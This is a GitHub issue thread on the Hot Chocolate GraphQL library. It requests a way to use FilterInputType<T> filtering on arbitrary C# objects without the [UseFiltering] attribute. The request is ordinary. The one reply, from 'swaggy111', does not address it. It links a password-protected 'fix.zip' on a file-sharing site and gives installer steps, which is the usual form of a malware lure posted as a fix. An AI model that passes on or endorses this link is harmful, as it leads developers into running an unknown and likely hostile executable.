### ISSUE TITLE
Using FilterType<T> without [UseFiltering], allowing the code to apply it anywhere

### ISSUE THREAD

**Issue by wietlol** [ChilliCream/graphql-platform#7405]
### Product

Hot Chocolate

### Is your feature request related to a problem?

Our code needs to invoke the Hot Chocolate filtering engine anywhere in the code instead of only being applied to results of a query with IQueryables or lists.

A simple test scenario can be found here:
https://github.com/wietlol-org/HotChocolateIssues/tree/main/HotChocolateIssues.FilterUsage

### The solution you'd like

The goal is to have an input field of type `FilterInputType<T>` that would accurately describe the filter.
And then to test if a given C# object matches that filter.

As a bonus feature, give the filter engine class a method to be applied on an IQueryable the same way how `[UseFiltering]` would work.

In that project is a unit test that can verify if the filtering works as expected.

The type of the filter in the C# code is currently `Dictionary<string, object?>` but if there is a more appropriate type, that would be better.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
